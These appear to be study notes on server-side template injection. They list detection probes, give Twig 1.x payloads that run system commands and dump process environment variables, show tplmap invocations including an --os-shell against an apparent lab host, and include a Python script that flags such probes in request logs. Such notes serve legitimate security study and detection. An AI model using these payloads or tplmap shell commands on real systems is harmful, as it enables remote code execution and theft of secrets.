Server Side Template Injection (SSTI)

SSTI Identification

Submit each of these probes in the user-controlled parameter; a response that renders 49 shows the input was evaluated by a template engine, and which syntax fires narrows down the engine in use:

{7*7}
${7*7}
#{7*7}
%{7*7}
{{7*7}}

TWIG SSTI

Twig has a variable, _self, which in simple terms exposes some of the engine's internal APIs to the template. Because _self is documented, we don't need to brute force any variable names. Through it we can reach the environment's getFilter function, which ends up executing a user-defined callback via the following process:

  • Register a function as a filter callback via registerUndefinedFilterCallback

  • Invoke _self.env.getFilter() with an unknown filter name, which triggers the callback we just registered with that name as its argument

Note that this relies on the old Twig 1.x behaviour in which _self is the template object; in current Twig releases _self no longer exposes the environment. The payload below is the one from these notes:

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}

To read the process environment variables we can use:

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("echo -e `cat /proc/self/environ`")}}
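As an added example for the identification probes and the Twig _self.env sink above (this is not code from the original notes), here is a small Python triage script that decodes form-encoded request bodies and flags values carrying either an arithmetic probe or the _self.env sink; the sample bodies are constructed, not real traffic, and the regexes are a first-pass signal rather than a full template grammar.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request bodies (form-encoded); these are not real captures.
SAMPLE_REQUESTS = [
    "email=test%40example.com",                    # ordinary value
    "email=%7B%7B7*7%7D%7D",                       # decodes to {{7*7}}
    "email=%24%7B7*7%7D",                          # decodes to ${7*7}
    "email=%7B%7B_self.env.registerUndefinedFilterCallback(%22system%22)%7D%7D",
    "name=John+%7Bsmith%7D",                       # braces without an expression: benign
]

# Patterns for the probe syntaxes listed in the identification section
# ({7*7}, ${7*7}, #{7*7}, %{7*7}, {{7*7}}) and for the Twig _self.env sink.
PROBE_PATTERNS = {
    "arith_probe": re.compile(r"[$#%]?\{\{?\s*\d+\s*[*+\-/]\s*\d+\s*\}?\}"),
    "twig_self_env": re.compile(
        r"_self\.env\.(registerUndefinedFilterCallback|getFilter)"
    ),
}


def classify_value(value):
    """Return the names of every pattern that fires on one decoded parameter value."""
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(value)]


def scan_request(raw_body):
    """Decode a form-encoded body and return (param, value, hits) for suspicious values."""
    findings = []
    for param, values in parse_qs(raw_body, keep_blank_values=True).items():
        for value in values:
            hits = classify_value(value)
            if hits:
                findings.append((param, value, hits))
    return findings


def scan_all(bodies):
    """Run scan_request over a list of bodies and flatten the findings."""
    return [finding for body in bodies for finding in scan_request(body)]


if __name__ == "__main__":
    for param, value, hits in scan_all(SAMPLE_REQUESTS):
        print(f"{param}={value!r} -> {', '.join(hits)}")
```

Feeding the script decoded parameter values from access or WAF logs gives a quick list of requests worth pulling the full body for.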

Automating SSTI using tplmap

We can automate detection and exploitation with tplmap, pointing it at the parameter identified above and routing traffic through a local proxy so the requests can be inspected:

python tplmap.py -u 'http://83.136.251.226:56235/jointheteam' -d email=test --proxy=http://127.0.0.1:8080

OS shell using tplmap

python tplmap.py -u 'http://83.136.251.226:56235/jointheteam' -d email=test --proxy=http://127.0.0.1:8080 --os-shell
